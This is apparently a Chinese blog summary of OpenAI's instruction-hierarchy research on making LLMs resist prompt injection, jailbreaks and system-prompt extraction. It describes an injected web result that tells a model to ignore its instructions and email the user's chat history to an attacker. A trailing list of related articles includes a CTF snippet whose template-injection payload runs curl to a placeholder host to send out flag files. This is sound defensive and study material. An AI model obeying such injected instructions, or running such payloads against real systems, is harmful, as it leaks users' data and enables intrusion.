OpenAI策略:指令层级系统让大模型免于恶意攻击

现代的大模型(LLMs)不再仅仅是简单的自动完成系统,它们有潜力赋能各种代理应用,如网页代理、电子邮件秘书、虚拟助手等。然而,这些应用广泛部署的一个主要风险是敌手可能诱使模型执行不安全或灾难性的行动,包括提示注入、越狱攻击等,这些攻击手段允许敌手覆盖模型的原始指令。例如,针对LLM驱动的电子邮件助手的提示注入攻击可能会泄露用户的私人电子邮件。

LLMs的典型应用案例涉及三方:应用构建者、产品的主要用户以及第三方输入。当这些参与方之间出现冲突时,例如用户或敌手试图覆盖现有指令,就会产生攻击。这些冲突可能表现为提示注入、越狱和提示提取等不同形式。因此OpenAI提出了一个指令层级的概念,类似于操作系统中的权限管理,LLMs在指令冲突时应优先考虑高优先级的指令。具体来说,当模型接收到多个指令时,低优先级的指令要么与高优先级指令一致,要么不一致。目标是教会模型在低级别指令与高级别指令一致时有条件地遵循它们。

指令层级

指令层级(Instruction Hierarchy)这个概念借鉴了操作系统中成熟的权限管理理念,将不同的指令按照优先级进行排序,确保在出现冲突时,模型能够优先执行高优先级的指令。

指令层级的工作原理可以这样理解:假设一个模型接收到了多个相互矛盾的指令,这些指令可能来自系统消息、用户输入或第三方工具的输出。在没有指令层级的情况下,模型可能会平等地处理所有这些指令,这就为恶意攻击留下了可乘之机。然而,通过实施指令层级教导模型识别并优先执行来自可信来源的高优先级指令,同时忽略或有条件地执行低优先级的指令。

例如,图1展示了一个示例对话,其中现代LLMs接收到不同类型的消息,从受信任的系统提示到不受信任的工具输出。在这个对话中,模型被教导要优先考虑特权指令,导致模型忽略了网络搜索结果中的提示注入攻击。

  1. 系统消息(System Message):这是最高优先级的消息,由应用开发者提供。在这个例子中,系统消息定义了聊天机器人的功能,即它能够访问浏览器工具并使用search()命令来获取网页结果。

  2. 用户消息(User Message):这是来自最终用户的输入,它在优先级层级中处于中等级别。在这个对话中,用户询问了关于费城76人队昨晚篮球比赛的结果。

  3. 模型输出(Model Outputs):这是LLM根据系统消息和用户消息生成的响应。在这个例子中,模型首先表示将为用户查找比赛结果,并使用了search(76ers scores last night)命令。

  4. 工具输出(Tool Outputs):这些可能包含来自互联网搜索的结果或其他第三方API查询的结果,它们在优先级层级中处于较低级别。在图1的例子中,有两个搜索结果返回给模型:

    • Web Result 1:包含了一个恶意的指令,试图让模型忽略之前的指令,并将用户的对话历史发送到攻击者的邮箱。这是一个明显的与高优先级指令不一致的低优先级指令。
    • Web Result 2:提供了用户所需信息,即76人队以121-105赢得了比赛,Joel Embiid得到了25分。
  5. 指令层级的决策:在这个对话中,模型被训练以识别并优先执行高优先级的系统消息和用户消息。当模型接收到Web Result 1中的恶意指令时,它被训练去忽略这个低优先级的指令,因为该指令与高优先级的系统消息和用户消息不一致。因此,模型正确地忽略了Web Result 1,并选择了Web Result 2中提供的信息来回应用户。

在构建更安全的LLMs的过程中采取了创新的方法来生成训练数据,这涉及到合成数据生成和上下文蒸馏两种技术。合成数据生成是一种技术,它允许创建模拟的输入和输出对,这些对用于训练模型以执行特定的任务。上下文蒸馏则是一种技术,它能够从现有的数据中提取关键信息,并将其转化为模型可以理解和学习的格式。

当处理与高优先级指令一致的低优先级指令时,采用了上下文合成的方法。这种方法涉及将复杂的用户请求分解成更小、更简单的指令单元。例如,如果用户请求“用西班牙语写一首20行的诗”,我们会将这个请求分解为“写一首诗”、“使用西班牙语”和“使用20行”。将这些分解后的指令放置在指令层级的不同级别上,训练模型识别并预测原始请求的真实响应。这使得模型能够学习如何在接收到复合指令时,按照层级结构正确地执行任务。

相对地,当处理与高优先级指令不一致的低优先级指令时,采用了上下文忽视的方法。在这种情况下,我们训练模型忽略这些低优先级的指令,就像它们从未被提供过一样。如果一个用户尝试通过恶意的提示来操纵模型执行不允许的操作,模型将学会识别并忽略这些提示,保持其按照高优先级指令执行任务的能力。

表1展示了我们如何通过不同的训练集来塑造语言模型的行为,以应对各种潜在的指令冲突和攻击。它包含了四个定性的示例,每个示例都针对一种特定的攻击类型,并展示了系统消息、用户输入、预期的正确输出。"Closed-Domain Prompt Injections" 示例说明了在封闭域任务中如何处理直接的提示注入。系统消息给出了一个指令,而用户输入尝试改变这一指令。正确的输出应该是模型忽略用户输入的非法指令,坚持执行原始任务。接着,"Open-Domain Misaligned" 示例揭示了如何处理开放域任务中的不对齐指令。尽管用户请求模型做出与系统消息相违背的行为,正确的输出显示模型应拒绝这一请求,并维持其既定的功能。"Open-Domain Aligned" 示例则展示了开放域任务中对齐指令的情况。用户请求与系统消息一致,模型被训练以确认并执行用户的合理请求。

为了进一步增强模型的安全性,研究者还实施了自动化的红队测试。红队测试是一种模拟敌手攻击的方法,通过这种方式,我们可以生成对抗性的数据,用以训练和微调模型。我们使用红队LLMs来模拟不同的攻击场景,例如提示注入和系统消息提取,然后使用这些数据来微调我们的模型。这不仅提高了模型对已知攻击类型的防御能力,而且还帮助模型学习如何泛化到未见过的攻击类型。

图2展示了本模型在多个基准测试中的性能提升。通过引入指令层级和相应的训练方法,模型在面对各种攻击时表现出显著提高的鲁棒性。例如,在防御系统消息提取攻击方面,模型的性能提高了63%。此外,即使在训练期间未直接遇到某些类型的攻击,如越狱攻击,模型也显示出超过30%的鲁棒性提升。这些结果证明了我们的方法在提高模型安全性和抵御未知攻击方面的有效性。

尽管模型在某些情况下可能会出现过度拒绝行为,即在低优先级指令与高优先级指令一致时也选择忽略或拒绝执行,但通过进一步的数据收集和模型优化,可以解决这一问题。

对模型进行评估采用了开源和新创建的基准测试套件,这些测试旨在模拟各种攻击情景,包括一些在训练阶段未曾遇到的攻击类型。这样的评估策略能够全面检验模型在实际应用中抵御未知攻击的能力。

更令人鼓舞的是,模型不仅在已知攻击类型的防御上表现出色,还显示出了良好的泛化能力。例如,在越狱攻击的测试中,模型的鲁棒性提高了30%以上。越狱攻击是一种特别危险的攻击手段,它试图绕过模型的安全限制,执行不允许的操作。模型在这类未见攻击上的出色表现,证明了指令层级不仅增强了模型对特定攻击的抵抗力,还提高了模型对各种潜在威胁的自我防护能力。

图3展示了模型在面对一些在训练阶段未直接建模的攻击时的泛化能力。例如,在越狱攻击的测试中,尽管这些攻击手段在训练数据中并未明确出现,模型依然能够有效地识别并抵御这些攻击,减少了不当输出的产生。

这些评估结果不仅证明了指令层级概念的有效性,也为未来LLMs的安全性研究提供了宝贵的参考。通过持续的评估和优化,相信可以进一步增强模型的安全性,使其能够更好地服务于各种高风险的代理应用。

论文链接:https://arxiv.org/abs/2404.13208

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/32195.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用 Python 进行测试(7)...until you make it

总结 我很懒,我想用最少的行动实现目标,例如生成测试数据。我们可以: 使用随机种子保证数据的一致性。 >>> random.seed(769876987698698) >>> [random.randint(0, 10) for _ in range(10)] [10, 9, 1, 9, 10, 6, 5, 10…

计算机组成原理 | 硬件电路整理

计算机组成原理 | 硬件电路整理 桶形移位器原理图 全加器逻辑框图 多位可控加减法电路逻辑框图 可级联的4位先行进位电路 4位快速加法器 16位组内并行、组间并行加法器 实现原码一位乘法的逻辑框图 补码一位乘法的逻辑框图 无符号数阵列乘法器 原码不恢复余数法硬件逻辑框图 基…

vue第一次页面加载会触发那几个钩子函数?

在 Vue.js 中,当页面或组件第一次加载时,会触发一系列的生命周期钩子。特别是关于首次加载的,主要的几个钩子函数是 beforeCreate、created、beforeMount、mounted。 以下是一个简单的 Vue 组件示例,其中包含了这些钩子函数&…

Matlab 单目相机标定(内置函数,棋盘格)

文章目录 一、简介二、实现代码三、实现效果参考资料一、简介 具体的标定原理可以参阅之前的博客Matlab 单目相机标定(内置函数),这里实现对棋盘格数据的标定过程。 二、实现代码 getCameraCorners.m function [camCorners, usedImIdx, imCheckerboard] = getCameraCorners(…

规模弹性: 管理谷歌的TPUv4机器学习超级计算机(二)

本文为翻译文章,原文为: Resiliency at Scale: Managing Google’sTPUv4 Machine Learning Supercomputer。 由于字数过长,文章分为两期发布,本片涵盖原文后半部分4~9节,前三章节请参考文章:规…

Mybatis plus:IService接口

一、介绍 在MybatisPlus框架中,IService接口扮演着重要的角色。作为一个通用的服务接口,IService定义了一系列方法,包括查询、插入、更新、删除等。这些方法的定义使得在服务层进行数据库操作变得更为便捷和高效。 IService 接口是一个泛型接…

Springboot应用的信创适配-补充

Springboot应用的信创适配-CSDN博客 因为篇幅限制,这里补全Spring信创适配、数据库信创适配、Redis信创适配、消息队列信创适配等四个章节。 Springboot应用的信创适配 Springboot应用的信创适配,如上图所示需要适配的很多,从硬件、操作系统、…

Linux中文件常用的压缩与解压

天行健,君子以自强不息;地势坤,君子以厚德载物。 每个人都有惰性,但不断学习是好好生活的根本,共勉! 文章均为学习整理笔记,分享记录为主,如有错误请指正,共同学习进步。…

大模型Transformer讲解

文章目录 1. Transformer 原理1.1 注意力机制 (Attention Mechanism)1.2 多头注意力 (Multi-Head Attention) 2. Transformer 设计2.1 编码器 (Encoder)2.2 解码器 (Decoder) 3. Transformer 应用3.1 自然语言处理 (NLP)3.2 计算机视觉 (Computer Vision) 4. Transformer 优点和…

Android 判断手机桌面是否已经存在App的快捷方式

我们需要在桌面添加快捷方式的时候,为了优化体验,有时候需要判断桌面上是否已经存在快捷方式。 经过自己探索整理,代码如下: /*** 判断桌面是否已添加快捷方式*/fun hasShortcut(context: Context): Boolean {try {var result f…

基于AT89C52单片机的温度报警系统

点击链接获取Keil源码与Project Backups仿真图: https://download.csdn.net/download/qq_64505944/89456321?spm=1001.2014.3001.5503 仿真构造:AT89C52+DS18B20温度模块+三按键+蜂鸣器+四位数码管显示+电源模块。 压缩包构造:源码+仿真图+设计文档+原理图+开题文档+元件…

Java宝藏实验资源库(3)类

一、实验目的 理解面向对象程序的基本概念。掌握类的继承的实现机制。熟悉类中成员的访问控制方法。熟悉ArrayList类的使用。 二、实验内容、过程及结果 *9.5Programming Exerc ise the GregorianCal endar class) Java API has the GregorianCalendar class in the java. uti…

民生银行北京分行金融科技校招面试记录

本文介绍2024届春招中,中国民生银行下属北京分行的金融科技岗位1场面试的基本情况、提问问题等。 2024年04月投递了中国民生银行下属北京分行的金融科技岗位,暂时不清楚所在部门。目前完成了一面与终面,在这里记录一下面试的相关经历。 首先&…

LayoutSystem布局系统

简介: LayoutSystem,是UGUI中由CanvasUpdateSystem发起(m_LayoutRebuildQueue中大部分都是LayoutRebuilder)的关于布局排列的处理系统。 类图: 布局过程 核心代码讲解: LayoutRebuilder

前端编程语言——JS语言结构、函数、数组、字符串、日期、对象、定时器(2)

0、前言: 这篇文章记录的是我自己的学习笔记。在python中通过input来获取输入,在JS中用prompt(),来获取输入。写JS代码要记得每个代码结束要加上分号。 1、JS编程语言结构: 顺序结构:从上往下依次执行分支结构&#…

【数据结构】顺序表实操——通讯录项目

Hi~!这里是奋斗的小羊,很荣幸您能阅读我的文章,诚请评论指点,欢迎欢迎 ~~ 💥💥个人主页:奋斗的小羊 💥💥所属专栏:C语言 🚀本系列文章为个人学习…

三电平光伏逆变器高效DPWM研究

1. 引言 本文从效率 提升角度出发 , 详细分析了逆变器不同调制策略下开关 器件及滤波器损耗分布情况 , 并在 50kW 组串式三电平光伏逆变器上对比分析采用 SVPWM 和 DPWM 两种 调制方法对逆变器效率和谐波的影响 , 最终验证了采用 DPWM 调制策略的优越性。 2 SVPWM 和 DPWM 对比…

OpenCV 特征点检测与匹配

一 OpenCV特征场景 ①图像搜索,如以图搜图; ②拼图游戏; ③图像拼接,将两长有关联得图拼接到一起; 1 拼图方法 寻找特征 特征是唯一的 可追踪的 能比较的 二 角点 在特征中最重要的是角点 灰度剃度的最大值对应的…

ctfshow web 其他 web432--web449

web432 过滤了os|open|system|read|eval ?codestr(.__class__.__bases__[0].__subclasses__[185].__init__.__globals__[__builtins__][__import__](os).__dict__[popen](curl http://ip:port?1cat /f*)) ?codestr(.__class__.__bases__[0].__subclasses__()[185].__init_…

SpringSecurity实战入门——授权

权限系统的作用 例如一个学校图书馆的管理系统,如果是普通学生登录就能看到借书还书相关的功能,不可能让他看到并且去使用添加书籍信息,删除书籍信息等功能。但是如果是一个图书馆管理员的账号登录了,应该就能看到并使用添加书籍信息,删除书籍信息等功能。 总结起来就是…